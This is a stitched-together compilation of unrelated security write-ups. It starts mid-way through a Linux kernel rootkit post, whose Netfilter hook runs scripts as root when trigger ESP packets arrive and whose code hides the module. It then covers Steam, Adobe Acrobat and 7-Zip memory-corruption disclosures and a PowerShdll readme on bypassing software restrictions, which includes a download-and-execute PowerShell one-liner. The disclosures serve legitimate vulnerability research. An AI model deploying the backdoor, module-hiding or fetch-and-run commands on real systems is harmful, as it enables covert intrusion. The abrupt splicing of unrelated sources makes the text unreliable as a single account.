When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.
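For orientation, registering such a hook at the pre-routing stage looks roughly like this on the older kernels targeted in this post (function_name is the callback whose prototype is shown in the Netfilter Code section below; kernels newer than roughly 4.13 use nf_register_net_hook(&init_net, ...) instead):

#include <linux/module.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

static struct nf_hook_ops pre_route_ops = {
    .hook     = function_name,          /* packet inspection callback               */
    .hooknum  = NF_INET_PRE_ROUTING,    /* earliest point in the IPv4 receive path  */
    .pf       = PF_INET,
    .priority = NF_IP_PRI_FIRST,        /* run before other hooks                   */
};

static int __init hook_init(void)
{
    return nf_register_hook(&pre_route_ops);
}

static void __exit hook_exit(void)
{
    nf_unregister_hook(&pre_route_ops);
}

module_init(hook_init);
module_exit(hook_exit);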

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}
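The snippets above assume esp_header has already been located. A hedged sketch of how to do that from the ip_header obtained earlier (this assumes the ESP header is linear in the skb, which a robust hook should confirm, e.g. with pskb_may_pull):

#include <linux/ip.h>   /* struct iphdr, struct ip_esp_hdr */

struct ip_esp_hdr *esp_header;

/* the ESP header sits immediately after the IP header; ihl is in 32-bit words */
esp_header = (struct ip_esp_hdr *)((unsigned char *)ip_header + ip_header->ihl * 4);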

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works when invoked with call_usermodehelper. See this Wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading them into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key.” Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Remote Code Execution Vulnerability in the Steam Client


Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client



The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:
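The original post shows the packet structure as an image. Roughly, per the linked research, it can be sketched as follows; treat the field order and widths as my paraphrase of that documentation rather than something taken from the binary:

#include <stdint.h>

struct steam_udp_header {          /* illustrative layout only */
    char     magic[4];             /* "VS01"                                    */
    uint16_t packet_len;           /* length of the payload in this packet      */
    uint8_t  type;                 /* 0x2/0x4/0x5/0x6/0x7, see the key points   */
    uint8_t  flags;
    uint32_t source;               /* connection IDs used for routing           */
    uint32_t destination;
    uint32_t seq_this;             /* sequence number of this packet            */
    uint32_t seq_acked;            /* last sequence number seen from the peer   */
    uint32_t split_count;          /* number of fragments in the datagram       */
    uint32_t seq_no_of_first_pkt;  /* sequence number of the first fragment     */
    uint32_t data_len;             /* total length of the reassembled datagram  */
};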

Key points:

  • All packets start with the 4 bytes “VS01”
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060, and split_count is validated to be less than 0x709b packets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_len bytes. Assuming this succeeds (and the code makes no effort to check – a minor bug), the datagram payload is then copied into this buffer using memmove, trusting the field packet_len as the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied into a very small buffer, resulting in an exploitable heap corruption.

Figure 4
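In pseudo-C, the flawed sequence described above boils down to something like this (all names are mine for illustration, not symbols from the binary):

/* first fragment of a datagram */
if (collection_buffer)
    free(collection_buffer);
collection_buffer = malloc(data_len);             /* allocation sized by data_len              */
/* missing check: if (packet_len > data_len) the packet should be rejected                      */
memmove(collection_buffer, payload, packet_len);  /* copy sized by packet_len (up to 64kb)      */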

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.
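The allocation and deallocation behaviour described above can be summarised in the following sketch, which mirrors the description rather than Valve’s actual code (pointers are 4 bytes in the 32-bit steamclient.dll):

struct chunk { struct chunk *next_free_block; };   /* occupies the first bytes of a free chunk */

static struct chunk *freelist_head;                /* member of the allocator class            */

void *alloc_chunk(void) {
    struct chunk *c = freelist_head;               /* unlink the first free chunk              */
    freelist_head = c->next_free_block;            /* its next pointer becomes the new head    */
    return c;
}

void free_chunk(void *p) {
    struct chunk *c = (struct chunk *)p;
    c->next_free_block = freelist_head;            /* old head stored inside the freed chunk   */
    freelist_head = c;                             /* freed chunk becomes the new head         */
}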

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (e.g. CWorkItemNetFilterEncrypt, CWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT, and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now holds the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

RCE in Adobe Acrobat

This post describes the buffer overflow and shows how the researcher bypassed the original patch in a couple of hours.

Introduction

Over the past couple of years we’ve seen a spike in vulnerabilities affecting Adobe products, with Adobe Acrobat and Reader having a decent share of attention during that increase of submissions. While most of these vulnerabilities are simple file parsing issues, there have been quite a few interesting XML Forms Architecture (XFA) and JavaScript vulnerabilities, as well.

JavaScript vulnerabilities specifically have always been interesting for attackers due to the amount of control they give the attacker over the bug (allocations/frees/spraying etc.). Many vulnerabilities exist in the JavaScript engine within Acrobat, as evidenced by the 80 advisories we’ve published concerning Acrobat just this year. As such, the patches for Acrobat should be as robust as possible. However, this is not always the case.

Throughout this blog post, I will discuss a vulnerability that we received through the program (ZDI-18-173) that affected the setIntent Optional Content Groups (OCG) JavaScript function. This vulnerability is interesting because it looks similar to what we’ve been seeing in the browser world and due to the way Adobe tried to patch it.

Overview

OCGs are used to control the visibility of page contents. In Acrobat, it is possible to create and control these layers through JavaScript.

For example, we can create a simple OCG through the addWatermarkFromText function:

this.addWatermarkFromText("AAA");

We can retrieve the OCGs through the getOCGs function:

this.getOCGs();

OCG objects expose various properties and methods that allow us to control the layers to a certain extent. One method of interest is the setIntent method. This method is used to set the OCG intent array.

According to the JavaScript API reference, this function takes an array as an argument. We can verify this from the console:

The Bug

setIntent is implemented inside Escript.api, which is located inside the plug-ins folder in Acrobat. I won’t dig into how to locate setIntent in Escript in this blog — we’ll cover that in a future MindshaRE blog.

For now, let’s assume that we located setIntent in Escript:

I’ve removed portions of the decompiled code of the sub_238B9F62 function and only kept the portions that are relevant:

At [1] in Figure 2 above, the length property of the array is retrieved and is fully controlled by the attacker. Then at [3] in the figure above, memory is allocated based on the size computed at [2]. Finally, at [4], the length is used in a loop that overflows the allocated buffer:
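In outline, the flawed pattern looks something like the following C sketch; the helper names and the exact size computation are illustrative, not Adobe's actual code:

unsigned int len  = get_intent_array_length(arr);    // [1] the length property, fully attacker-controlled
unsigned int size = len * 2;                          // [2] 32-bit computation wraps once len > 0x7FFFFFFF
char *buf = (char *)malloc(size);                     // [3] tiny allocation after the wrap
for (unsigned int i = 0; i < len; i++) {              // [4] loop is still bounded by len
    buf[i * 2] = fetch_element(arr, i);               //     writes far beyond the allocation
}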

The POC

Logically, any value that causes the wrap ( > 0x7FFFFFFF) takes the vulnerable code path. Hence, this fact should be taken into consideration when fixing the bug. Nevertheless, Adobe’s developers decided to take a shortcut with the patch:

They wanted to make sure that the size is not exactly 0x7FFFFFFF. Obviously, this was an inadequate response because that’s not the only value that triggers the bugs.

Once the patch was out, the researcher did not waste any time. He literally sent us the patch bypass a couple of hours later. The POC looks exactly the same as the original POC with a minor change: setting the array length with 0xFFFFFFFF instead of 0x7FFFFFFF. Again, any value greater than 0x7FFFFFFF would work. Here’s the bypass:

This time, the developers at Adobe realized that simple value checks won’t cut it and came up with the following solution to avoid the integer wrap:
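The screenshot of the fixed code is not reproduced here, but the principle is to reject any length whose size computation would wrap before allocating, for example (a sketch of the idea only, not Adobe's exact code):

if (len > 0xFFFFFFFFu / 2) {      // len * 2 would overflow 32 bits
    return ERROR_BAD_LENGTH;      // hypothetical error path: bail out before allocating
}
unsigned int size = len * 2;      // now guaranteed not to wrap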

Conclusion

It’s amazing how huge the attack surface is for Adobe Acrobat. It’s also amazing to think how many systems have Acrobat installed. What makes it even more interesting is the lack of advanced mitigations, which makes it relatively easier to target than other applications. Add to that some less than proper patching, and it’s easy to see why it remains a popular target for researchers.

When compared to some other vendors, there’s still a long way for Acrobat to catch up with the modern mitigation game, and we’ll be watching their improvements closely. Until then, Acrobat will likely remain an attractive target for bug hunters.

Run PowerShell with rundll32. Bypass software restrictions.

Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls.


dll mode:

Usage:
rundll32 PowerShdll,main <script>
rundll32 PowerShdll,main -f <path>       Run the script passed as argument
rundll32 PowerShdll,main -w      Start an interactive console in a new window
rundll32 PowerShdll,main -i      Start an interactive console in this console
If you do not have an interactive console, use -n to avoid crashes on output

exe mode

Usage:
PowerShdll.exe <script>
PowerShdll.exe -f <path>       Run the script passed as argument
PowerShdll.exe -i      Start an interactive console in this console

Examples

Run base64 encoded script

rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Download and run script

rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

Requirements

  • .Net v3.5 for dll mode.
  • .Net v2.0 for exe mode.

Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interactive mode and command output rely on hijacking the parent process’ console. If the parent process does not have a console, use the -n switch to suppress output, otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.

7-Zip: Multiple Memory Corruptions via RAR and ZIP

Introduction

In the following, I will outline two bugs that affect 7-Zip before version 18.00 as well as p7zip. The first one (RAR PPMd) is the more critical and the more involved one. The second one (ZIP Shrink) seems to be less critical, but also much easier to understand.

Memory Corruptions via RAR PPMd (CVE-2018-5996)

7-Zip’s RAR code is mostly based on a recent UnRAR version. For version 3 of the RAR format, PPMd can be used, which is an implementation of the PPMII compression algorithm by Dmitry Shkarin. If you want to learn more about the details of PPMd and PPMII, I’d recommend Shkarin’s paper PPM: one step to practicality.

Interestingly, the 7z archive format can be used with PPMd as well, and 7-Zip uses the same code that is used for RAR3. As a matter of fact, this is the very PPMd implementation that was used by Bitdefender in a way that caused a stack based buffer overflow.

In essence, this bug is due to improper exception handling in 7-Zip’s RAR3 handler. In particular, one might argue that it is not a bug in the PPMd code itself or in UnRAR’s extraction code.

The Bug

The RAR handler has a function NArchive::NRar::CHandler::Extract containing a loop that looks roughly as follows (heavily simplified!):

for (unsigned i = 0;; i++, /*OMITTED: unpack size updates*/) {
  //OMITTED: retrieve i-th item and setup input stream
  CMyComPtr<ICompressCoder> commonCoder;
  switch (item.Method) {
    case '0':
    {
      commonCoder = copyCoder;
      break;
    }
    case '1':
    case '2':
    case '3':
    case '4':
    case '5':
    {
      unsigned m;
      for (m = 0; m < methodItems.Size(); m++)
        if (methodItems[m].RarUnPackVersion == item.UnPackVersion) { break; }
      if (m == methodItems.Size()) { m = methodItems.Add(CreateCoder(/*OMITTED*/)); }
      //OMITTED: solidness check
      commonCoder = methodItems[m].Coder;
      break;
    }
    default:
      outStream.Release();
      RINOK(extractCallback->SetOperationResult(NExtract::NOperationResult::kUnsupportedMethod));
      continue;
  }
  
  HRESULT result = commonCoder->Code(inStream, outStream, &packSize, &outSize, progress);
  //OMITTED: encryptedness, outsize and crc check
  outStream.Release();

  if (result != S_OK) {
    if (result == S_FALSE) { opRes = NExtract::NOperationResult::kDataError; }
    else if (result == E_NOTIMPL) { opRes = NExtract::NOperationResult::kUnsupportedMethod; }
    else { return result; }
  }
  RINOK(extractCallback->SetOperationResult(opRes));
}

The important bit about this function is essentially that at most one coder is created for each RAR unpack version. If an archive contains multiple items that are compressed with the same RAR unpack version, those will be decoded with the same coder object.

Observe, moreover, that a call to the Code method can fail, returning the result S_FALSE, and the created coder will be reused for the next item anyway, given that the callback function does not catch this (it does not). So let us see where the error code S_FALSE may come from. The method NCompress::NRar3::CDecoder::Code looks as follows (again simplified):

STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream *outStream,
    const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) {
  try {
    if (!inSize) { return E_INVALIDARG; }
    //OMITTED: allocate and initialize VM, window and bitdecoder
    _outStream = outStream;
    _unpackSize = outSize ? *outSize : (UInt64)(Int64)-1;
    return CodeReal(progress);
  }
  catch(const CInBufferException &e)  { return e.ErrorCode; }
  catch(...) { return S_FALSE; }
}

The CInBufferException is interesting. As the name suggests, this exception may be thrown while reading from the input stream. It is not completely straightforward, but nevertheless easily possible to trigger the exception with a RAR3 archive item such that the error code is S_FALSE. I will leave it as an exercise for the interested reader to figure out the details of how this can be achieved.

Why is this interesting? Well, because in case RAR3 with PPMd is used this exception may be thrown in the middle of an update of the PPMd model, putting the soundness of the model state at risk. Recall that the same coder will be used for the next item even after a CInBufferException with error code S_FALSE has been thrown.

Note, moreover, that the RAR3 decoder holds the PPMd model state. A brief look at the method NCompress::NRar3::CDecoder::InitPPM reveals that this model state is only reinitialized if an item explicitly requests it. This is a feature that allows keeping the same model with the collected probability heuristics between different items. But it also means that we can do the following:

  • Construct the first item of a RAR3 archive such that a CInBufferException with error code S_FALSE is thrown in the middle of a PPMd model update. Essentially, this means that we can let an arbitrary call to the Decode method of the range decoder used in Ppmd7_DecodeSymbol fail, jumping out of the PPMd code.
  • The subsequent item of the archive does not have the reset bit set that would cause the model to be reinitialized. Hence, the PPMd code will operate on a potentially broken model state.

So far this may not look too bad. In order to understand how this bug can be turned into attacker controlled memory corruptions, we need to understand a little bit more about the PPMd model state and how it is updated.

PPMd Preliminaries

The main idea of all PPM compression algorithms is to build a Markov model of some finite order D. In the PPMd implementation, the model state is essentially a 256-ary context tree of maximum depth D, in which the path from the root to the current context node is to be interpreted as a sequence of byte symbols. In particular, the parent relation is to be understood as a suffix relation. Additionally, every context node stores frequency statistics about possible successor symbols connected with a successor context node.

A context node is of type CPpmd7_Context, defined as follows:

typedef struct CPpmd7_Context_ {
  UInt16 NumStats;
  UInt16 SummFreq;
  CPpmd_State_Ref Stats;
  CPpmd7_Context_Ref Suffix;
} CPpmd7_Context;

The field NumStats holds the number of elements the Stats array contains. The type CPpmd_State is defined as follows:

typedef struct {
  Byte Symbol;
  Byte Freq;
  UInt16 SuccessorLow;
  UInt16 SuccessorHigh;
} CPpmd_State;

So far, so good. Now what about the model update? I will spare you the details, describing only abstractly how a new symbol is decoded:

  • When Ppmd7_DecodeSymbol is called, the current context is p->MinContext, which is equal to p->MaxContext, assuming a sound model state.
  • A threshold value is read from the range decoder. This value is used to find a corresponding symbol in the Stats array of the current context p->MinContext.
  • If no corresponding symbol can be found, p->MinContext is moved upwards the tree (following the suffix links) until a context with (strictly) larger Stats array is found. Then, a new threshold is read and used to find a corresponding value in the current Stats array, ignoring the symbols of the contexts that have been previously visited. This process is repeated until a value is found.
  • Finally, the range decoder’s decode method is called, the found state is written to p->FoundState, and one of the Ppmd7_Update functions is called to update the model. As a part of this process, the UpdateModel function adds the found symbol to the Stats array of each context between p->MaxContext and p->MinContext (exclusively).

One of the key invariants the update mechanism tries to establish is that the Stats array of every context contains each of the 256 symbols at most once. However, this property only follows inductively, since there is no explicit duplicate check when a new symbol is inserted. With the bug described above, it is easy to see how we can add duplicate symbols to Stats arrays:

  • The first RAR3 item is created such that a few context nodes are created, and the function Ppmd7_DecodeSymbol then moves p->MinContext upwards the tree at least once, until the corresponding symbol is found. Then, the subsequent call to the range decoder’s decode method fails with a CInBufferException.
  • The next RAR3 item does not have the reset bit set, so that we can continue with the previously created PPMd model.
  • The Ppmd7_DecodeSymbol function is entered with a fresh range decoder and p->MinContext != p->MaxContext. It finds the corresponding symbol immediately in p->MinContext. However, this symbol may now be one that already occurs in the contexts between p->MaxContext and p->MinContext. When the UpdateModel function is called, this symbol is added as a duplicate to the Stats array of each context between p->MaxContext and p->MinContext (exclusively).

Okay, so now we know how to add duplicate symbols into the Stats array. Let us see how we can make use of this to cause an actual memory corruption.

Triggering a Stack Buffer Overflow

The following code is run as a part of Ppmd7_DecodeSymbol to move the p->MinContext pointer upwards the context tree:

CPpmd_State *ps[256];
unsigned numMasked = p->MinContext->NumStats;
do {
  p->OrderFall++;
  if (!p->MinContext->Suffix) { return -1; }
  p->MinContext = Ppmd7_GetContext(p, p->MinContext->Suffix);
} while (p->MinContext->NumStats == numMasked);
UInt32 hiCnt = 0;
CPpmd_State *s = Ppmd7_GetStats(p, p->MinContext);
unsigned i = 0;
unsigned num = p->MinContext->NumStats - numMasked;
do {
  int k = (int)(MASK(s->Symbol));
  hiCnt += (s->Freq & k);
  ps[i] = s++;
  i -= k;
} while (i != num);

MASK is a macro that accesses a byte array which holds the value 0x00 at the index of each masked symbol, and the value 0xFF otherwise. Clearly, the intention is to fill the stack buffer ps with pointers to all unmasked symbol states.

Observe that the stack buffer ps has a fixed size of 256 and there is no overflow check. This means that if the Stats array contains a masked symbol multiple times, we can access the array out of bound and overflow the ps buffer.

Usually, such out of bound buffer reads make exploitation very difficult, because one cannot easily control the memory that is read. However, this is no issue in the case of PPMd, because the implementation allocates only one large pool on the heap, and then makes use of its own memory allocator to allocate all context and state structs within this pool. This ensures very quick allocation and a low memory usage, but it also allows an attacker to control the out of bound read to structures within this pool very reliably and independently of the system’s heap implementation. For example, the first RAR3 item can be constructed such that the pool is filled with the desired data, avoiding uninitialized out of bound reads.

